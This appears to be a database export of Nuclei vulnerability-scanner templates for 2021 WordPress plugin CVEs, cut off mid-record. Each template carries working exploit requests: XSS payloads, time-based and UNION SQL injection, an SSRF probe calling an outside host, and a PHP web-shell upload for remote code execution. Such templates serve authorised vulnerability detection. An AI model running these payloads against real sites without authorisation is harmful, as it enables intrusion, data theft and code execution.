"CVE-2021-24435.yaml", "content": "id: CVE-2021-24435\n\ninfo:\n name: WordPress Titan Framework plugin <= 1.12.1 - Cross-Site Scripting\n author: xcapri,ritikchaddha\n severity: medium\n description: |\n The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 2.7.12\n reference:\n - https://wpscan.com/vulnerability/a88ffc42-6611-406e-8660-3af24c9cc5e8\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24435\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24435\n - https://patchstack.com/database/vulnerability/titan-framework/wordpress-titan-framework-plugin-1-12-1-reflected-cross-site-scripting-xss-vulnerability\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24435\n cwe-id: CWE-79\n epss-score: 0.0014\n epss-percentile: 0.4866\n cpe: cpe:2.3:a:gambit:titan_framework:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: gambit\n product: titan_framework\n framework: wordpress\n tags: cve2021,cve,wp,xss,wp-plugin,titan-framework,wpscan,wordpress,gambit\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=%27/onerror=%27alert(document.domain)%27/b=%27\"\n - \"{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(document.domain)%20b=%27\"\n - \"{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20accesskey=%27x%27%20onclick=%27alert(document.domain)%27%20class=%27\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: regex\n regex:\n - (?i)(onerror=|onclick=)['\"]?alert\\(document\\.domain\\)['\"]?\n - '

    Grumpy wizards make'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b274a3153b4cde29ead1240a44502cbd6ca417a12104f68f3e81fc354ff0091b022100fa5610d0c8faa4d8504b66848c83c4d689be8c8c917cac6db669e55696f38ecc:922c64590222798bb761d5b6d8e72950", "hash": "bc8dfb20dcd6ba7853c3066bf0af156e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082be" }, "name": "CVE-2021-24436.yaml", "content": "id: CVE-2021-24436\n\ninfo:\n name: WordPress W3 Total Cache <2.1.4 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n WordPress W3 Total Cache plugin before 2.1.4 is susceptible to cross-site scripting within the extension parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This can allow an attacker to convince an authenticated admin into clicking a link to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: Fixed in version 2.1.4.\n reference:\n - https://wpscan.com/vulnerability/3e855e09-056f-45b5-89a9-d644b7d8c9d0\n - https://wordpress.org/plugins/w3-total-cache/\n - https://wpscan.com/vulnerability/05988ebb-7378-4a3a-9d2d-30f8f58fe9ef\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24436\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24436\n cwe-id: CWE-79\n epss-score: 0.001\n epss-percentile: 0.4009\n cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: boldgrid\n product: w3_total_cache\n framework: wordpress\n tags: cve2021,cve,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,authenticated,boldgrid\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=w3tc_extensions&extension=\"%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - status_code_2 == 200\n - contains(body_2, '>&action=view')\n - contains(header_2, \"text/html\")\n condition: and\n# digest: 490a0046304402201ef6e350c911751d8d5e81ed50cb77824d6c9a7d2c0f9d5ea8e46a0be6ed7eb60220354d8aed65ef0a2257c2b945941807aa31ab5378f1612ae21f59f25020ef5de6:922c64590222798bb761d5b6d8e72950", "hash": "9053096a22c59c1befde9282067b6099", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082bf" }, "name": "CVE-2021-24442.yaml", "content": "id: CVE-2021-24442\n\ninfo:\n name: Wordpress Polls Widget < 1.5.3 - SQL Injection\n author: ritikchaddha\n severity: critical\n description: |\n The Poll, Survey, Questionnaire and Voting system WordPress plugin before 1.5.3 did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks\n remediation: Fixed in 1.5.3\n reference:\n - https://wpscan.com/vulnerability/7376666e-9b2a-4239-b11f-8544435b444a/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24442\n - https://wordpress.org/plugins/polls-widget/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24442\n cwe-id: CWE-89\n epss-score: 0.00212\n epss-percentile: 0.58237\n cpe: cpe:2.3:a:wpdevart:poll\\,_survey\\,_questionnaire_and_voting_system:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wpdevart\n product: poll\\,_survey\\,_questionnaire_and_voting_system\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/polls-widget/\"\n tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli\n\nhttp:\n - raw:\n - |\n @timeout: 25s\n POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n X-Forwarded-For: {{randstr}}\n\n question_id=1&poll_answer_securety=8df73ed4ee&date_answers%5B0%5D=SLEEP(5)\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=5'\n - 'status_code == 200'\n - 'contains_all(body, \"{\\\"answer_name\", \"vote\\\":\")'\n condition: and\n# digest: 4a0a0047304502200a19043d7f0d2e1b48cc9b1ae8f2e1b84ac62c18df00ab187a07eb5f98ba5f17022100a48e6060c3f50a27b56f3505e1fa0b6480e1059eda4dcb34d325573dcb4743cf:922c64590222798bb761d5b6d8e72950", "hash": "9a12b6e64f8bb909aa16354a91c47e62", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082c0" }, "name": "CVE-2021-24452.yaml", "content": "id: CVE-2021-24452\n\ninfo:\n name: WordPress W3 Total Cache <2.1.5 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n WordPress W3 Total Cache plugin before 2.1.5 is susceptible to cross-site scripting via the extension parameter in the Extensions dashboard, when the setting 'Anonymously track usage to improve product quality' is enabled. The parameter is output in a JavaScript context without proper escaping. This can allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: Fixed in version 2.1.5.\n reference:\n - https://wpscan.com/vulnerability/3e855e09-056f-45b5-89a9-d644b7d8c9d0\n - https://wordpress.org/plugins/w3-total-cache/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24452\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24452\n cwe-id: CWE-79\n epss-score: 0.001\n epss-percentile: 0.4078\n cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: boldgrid\n product: w3_total_cache\n framework: wordpress\n tags: cve2021,cve,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,auth,boldgrid\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=w3tc_extensions&extension='-alert(document.domain)-' HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - status_code_2 == 200\n - contains(body_2, 'extensions/\\'-alert(document.domain)-\\'') && contains(body_2, 'w3-total-cache')\n - contains(header_2, \"text/html\")\n condition: and\n# digest: 4a0a0047304502203b2db738722a6a6e1cf4aa896871e333bccd3809069eeb42e599a6549a6a4cc80221008351b510b897929c71b87698098af6cc925f9e1328c8e1f63b39b87de2dd6fd5:922c64590222798bb761d5b6d8e72950", "hash": "70222eda6d735155e9139c34568ff0b6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082c1" }, "name": "CVE-2021-24472.yaml", "content": "id: CVE-2021-24472\n\ninfo:\n name: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery\n author: Suman_Kar\n severity: critical\n description: |\n Onair2 < 3.9.9.2 and KenthaRadio < 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.\n impact: |\n Remote File Inclusion/Server-Side Request Forgery vulnerability allows an attacker to include arbitrary files or make requests to internal resources, leading to potential data leakage, unauthorized access.\n remediation: |\n Update Onair2 to version 3.9.9.2 or higher and KenthaRadio to version 2.0.2 or higher to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/17591ac5-88fa-4cae-a61a-4dcf5dc0b72a\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24472\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24472\n cwe-id: CWE-918\n epss-score: 0.04362\n epss-percentile: 0.92159\n cpe: cpe:2.3:a:qantumthemes:kentharadio:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: qantumthemes\n product: kentharadio\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/qt-kentharadio\"\n tags: cve2021,cve,wordpress,lfi,ssrf,wp,wp-plugin,wpscan,qantumthemes\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp1/home-18/?qtproxycall=https://oast.me'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"

    Interactsh Server

    \"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022057be194a5808d00466ff72b9e508174e10f7370ed4dd276f27c062b8d8bc93c4022100a1fa11246e181d2b40cae6ef33377d5fb321750789d7bcc03b09c87b93238a16:922c64590222798bb761d5b6d8e72950", "hash": "ae3b511c515ac7be83a581300de5d086", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082c2" }, "name": "CVE-2021-24488.yaml", "content": "id: CVE-2021-24488\n\ninfo:\n name: WordPress Post Grid <2.1.8 - Cross-Site Scripting\n author: cckuailong\n severity: medium\n description: WordPress Post Grid plugin before 2.1.8 contains a reflected cross-site scripting vulnerability. The slider import search feature and tab parameter of thesettings are not properly sanitized before being output back in the pages,\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Update to the latest version of the WordPress Post Grid plugin (2.1.8 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24488\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24488\n cwe-id: CWE-79\n epss-score: 0.00302\n epss-percentile: 0.66468\n cpe: cpe:2.3:a:pickplugins:post_grid:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: pickplugins\n product: post_grid\n framework: wordpress\n tags: cve2021,cve,authenticated,wpscan,xss,wp,wordpress,wp-plugin,pickplugins\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\"onmouseover=alert(document.domain)// HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'value=\"\\\"onmouseover=alert(document.domain)/\">'\n - 'Post Grid'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022030e1b52d427b8fa524617a379f6c6577fd6b77e2b700feb71480fc7cc8beae5d022100dcd519ccb88c1a361a54e82b4e61a103ada287fb1416ae9e281a5c1b2a4132d7:922c64590222798bb761d5b6d8e72950", "hash": "1374d385482e964d4b1491f35759018b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082c3" }, "name": "CVE-2021-24495.yaml", "content": "id: CVE-2021-24495\n\ninfo:\n name: Wordpress Marmoset Viewer <1.9.3 - Cross-Site Scripting\n author: johnjhacking\n severity: medium\n description: WordPress Marmoset Viewer plugin before 1.9.3 contains a cross-site scripting vulnerability. It does not property sanitize, validate, or escape the 'id' parameter before outputting back in the page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update the Wordpress Marmoset Viewer plugin to version 1.9.3 or later to mitigate the vulnerability.\n reference:\n - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/\n - https://wordpress.org/plugins/marmoset-viewer/#developers\n - https://wpscan.com/vulnerability/d11b79a3-f762-49ab-b7c8-3174624d7638\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24495\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24495\n cwe-id: CWE-79\n epss-score: 0.00116\n epss-percentile: 0.44405\n cpe: cpe:2.3:a:marmoset:marmoset_viewer:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: marmoset\n product: marmoset_viewer\n framework: wordpress\n tags: cve2021,cve,xss,wpscan,wp-plugin,wordpress,intrusive,marmoset\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://\"\n - \"{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \n - alert(/{{randstr}}/)\n condition: or\n\n - type: word\n words:\n - Marmoset Viewer\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ad62d472ea3292c9468e6cb2fd946e3f2d275d92502da6f4c39ce040ba978b140220053b172dcde7c61ebe9b7ed6248cd910e232bb089c8707aaaedb6a4bc7f52f8e:922c64590222798bb761d5b6d8e72950", "hash": "eebc0cf339a48abb4bf3a2aa74f1fd8c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082c4" }, "name": "CVE-2021-24498.yaml", "content": "id: CVE-2021-24498\n\ninfo:\n name: WordPress Calendar Event Multi View <1.4.01 - Cross-Site Scripting\n author: suman_kar\n severity: medium\n description: WordPress Calendar Event Multi View plugin before 1.4.01 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php).\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update the WordPress Calendar Event Multi View plugin to version 1.4.01 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24498\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24498\n cwe-id: CWE-79\n epss-score: 0.00161\n epss-percentile: 0.51755\n cpe: cpe:2.3:a:dwbooster:calendar_event_multi_view:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: dwbooster\n product: calendar_event_multi_view\n framework: wordpress\n tags: cve2021,cve,xss,wordpress,wp-plugin,wpscan,dwbooster\n\nhttp:\n - raw:\n - |\n GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip, deflate\n Accept-Language: en-GB,en-US;q=0.9,en;q=0.8\n Connection: close\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '><'\n - 'Calendar Details'\n condition: and\n\n - type: word\n part: header\n words:\n - 'text/html'\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022053f7aa1da929328cbebc337daa2af812dc588d126578f5cfae4ff8b30fcc5e2702203cec9721837ea172c547273360bc6802dc4fae7d289079e5b59e5f73b956c4f8:922c64590222798bb761d5b6d8e72950", "hash": "b132d6e32e77a2aae0ac3da151a61a2a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082c5" }, "name": "CVE-2021-24499.yaml", "content": "id: CVE-2021-24499\n\ninfo:\n name: WordPress Workreap - Remote Code Execution\n author: daffainfo\n severity: critical\n description: WordPress Workreap theme is susceptible to remote code execution. The AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.\n remediation: |\n Update to the latest version of the Workreap plugin to fix the vulnerability.\n reference:\n - https://github.com/RyouYoo/CVE-2021-24499\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24499\n - https://wpscan.com/vulnerability/74611d5f-afba-42ae-bc19-777cdf2808cb\n - https://jetpack.com/2021/07/07/multiple-vulnerabilities-in-workreap-theme/\n - http://packetstormsecurity.com/files/172876/WordPress-Workreap-2.2.2-Shell-Upload.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24499\n cwe-id: CWE-434\n epss-score: 0.16767\n epss-percentile: 0.9591\n cpe: cpe:2.3:a:amentotech:workreap:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: amentotech\n product: workreap\n framework: wordpress\n tags: cve,cve2021,wpscan,packetstorm,rce,workreap,wordpress,wp-plugin,intrusive,wp,amentotech\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=------------------------cd0dc6bdc00b1cf9\n X-Requested-With: XMLHttpRequest\n\n -----------------------------cd0dc6bdc00b1cf9\n Content-Disposition: form-data; name=\"action\"\n\n workreap_award_temp_file_uploader\n -----------------------------cd0dc6bdc00b1cf9\n Content-Disposition: form-data; name=\"award_img\"; filename=\"{{randstr}}.php\"\n Content-Type: application/x-httpd-php\n\n \n -----------------------------cd0dc6bdc00b1cf9--\n - |\n GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"71abe5077dae2754c36d731cc1534d4d\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201e22febd5462a0be98462812711242057b437c93c64fd8835364333cd855ef6a022100bf167dcb1c4fd23ab6c1afc53058fc873c6c603b9f298cf0593d484f453a0b3b:922c64590222798bb761d5b6d8e72950", "hash": "1579d0662c14a94f9f920c0c01762ffd", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082c6" }, "name": "CVE-2021-24510.yaml", "content": "id: CVE-2021-24510\n\ninfo:\n name: WordPress MF Gig Calendar <=1.1 - Cross-Site Scripting\n author: dhiyaneshDK\n severity: medium\n description: WordPress MF Gig Calendar plugin 1.1 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize or escape the id GET parameter before outputting back in the admin dashboard when editing an event.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update to the latest version of WordPress MF Gig Calendar plugin (>=1.2) which includes proper input sanitization and validation.\n reference:\n - https://wpscan.com/vulnerability/715721b0-13a1-413a-864d-2380f38ecd39\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24510\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24510\n cwe-id: CWE-79\n epss-score: 0.00143\n epss-percentile: 0.50097\n cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:*:*:*:*:wordpress:*:*:*\n metadata:\n max-request: 2\n vendor: mf_gig_calendar_project\n product: mf_gig_calendar\n tags: cve2021,cve,wp-plugin,authenticated,wpscan,wordpress,mf_gig_calendar_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id=\"><\" HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022058dc77da6c8d24825cb047a3e8c3ebf81009329a2e76774ba7c0057029c91916022100e648680bb6ce6d636b0d7ec9f0cd812776cc4617bf039cc8bac7d00b1ae026d9:922c64590222798bb761d5b6d8e72950", "hash": "0bb89e0e8bf899c17562ac21ca279ff2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082c7" }, "name": "CVE-2021-24554.yaml", "content": "id: CVE-2021-24554\n\ninfo:\n name: WordPress Paytm Donation <=1.3.2 - Authenticated SQL Injection\n author: theamanrawat\n severity: high\n description: |\n WordPress Paytm Donation plugin through 1.3.2 is susceptible to authenticated SQL injection. The plugin does not sanitize, validate, or escape the id GET parameter before using it in a SQL statement when deleting donations. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation.\n remediation: |\n Update to the latest version of the WordPress Paytm Donation plugin (version > 1.3.2) to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/f2842ac8-76fa-4490-aa0c-5f2b07ecf2ad\n - https://wordpress.org/plugins/wp-paytm-pay/\n - https://codevigilant.com/disclosure/2021/wp-plugin-wp-paytm-pay/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24554\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2021-24554\n cwe-id: CWE-89\n epss-score: 0.20268\n epss-percentile: 0.95935\n cpe: cpe:2.3:a:freelancetoindia:paytm-pay:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: freelancetoindia\n product: paytm-pay\n framework: wordpress\n tags: cve,cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,freelancetoindia\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n @timeout: 10s\n GET /wp-admin/admin.php?page=wp_paytm_donation&action=delete&id=0%20AND%20(SELECT%205581%20FROM%20(SELECT(SLEEP(6)))Pjwy) HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration_2>=6'\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"paytm-settings_page_wp_paytm_donation\")'\n condition: and\n# digest: 490a0046304402206761ba0bbf5025dd6acebce6ae4c00348e7a0c42d2dabe4f89025ddf1f64856802200b643eb17601d207edb76a789e0506dab04b0d1e4d81a8cef2106f21c6234377:922c64590222798bb761d5b6d8e72950", "hash": "c6a72384bf2b2fcec1a8a034a5e05ae1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082c8" }, "name": "CVE-2021-24627.yaml", "content": "id: CVE-2021-24627\n\ninfo:\n name: G Auto-Hyperlink <= 1.0.1 - SQL Injection\n author: theamanrawat\n severity: high\n description: |\n The G Auto-Hyperlink WordPress plugin through 1.0.1 does not sanitise or escape an 'id' GET parameter before using it in a SQL statement, to select data to be displayed in the admin dashboard, leading to an authenticated SQL injection\n reference:\n - https://wordpress.org/plugins/g-auto-hyperlink/\n - https://wpscan.com/vulnerability/c04ea768-150f-41b8-b08c-78d1ae006bbb\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24627\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2021-24627\n cwe-id: CWE-89\n epss-score: 0.14515\n epss-percentile: 0.95609\n cpe: cpe:2.3:a:g_auto-hyperlink_project:g_auto-hyperlink:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: g_auto-hyperlink_project\n product: g_auto-hyperlink\n framework: wordpress\n publicwww-query: /wp-content/plugins/g-auto-hyperlink/\n tags: cve2021,cve,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated,g_auto-hyperlink_project\nvariables:\n num: 999999999\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+I\n - |\n GET /wp-admin/admin.php?page=g-auto-hyperlink-edit&id=-2198+UNION+ALL+SELECT+NULL%2Cmd5%28{{num}}%29%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - \"c8c605999f3d8352d7bb792cf3fdb25b\"\n - \"Keyword\"\n - \"g-auto-hyperlink-edit\"\n condition: and\n\n - type: word\n part: header_2\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100bdb4a94865f92c4bfb19042de1f21fae7eebca1adb86abff97ff76e2b8a8343002202507f1d079f5aad3bf0c38a5bed17afdc4c7d599611392cc29897c83b6be1425:922c64590222798bb761d5b6d8e72950", "hash": "4719bf45c54075c285536413e17bae37", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082c9" }, "name": "CVE-2021-24647.yaml", "content": "id: CVE-2021-24647\n\ninfo:\n name: Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login\n author: DhiyaneshDK\n severity: high\n description: |\n The Registration Forms User profile, Content Restriction, Spam Protection, 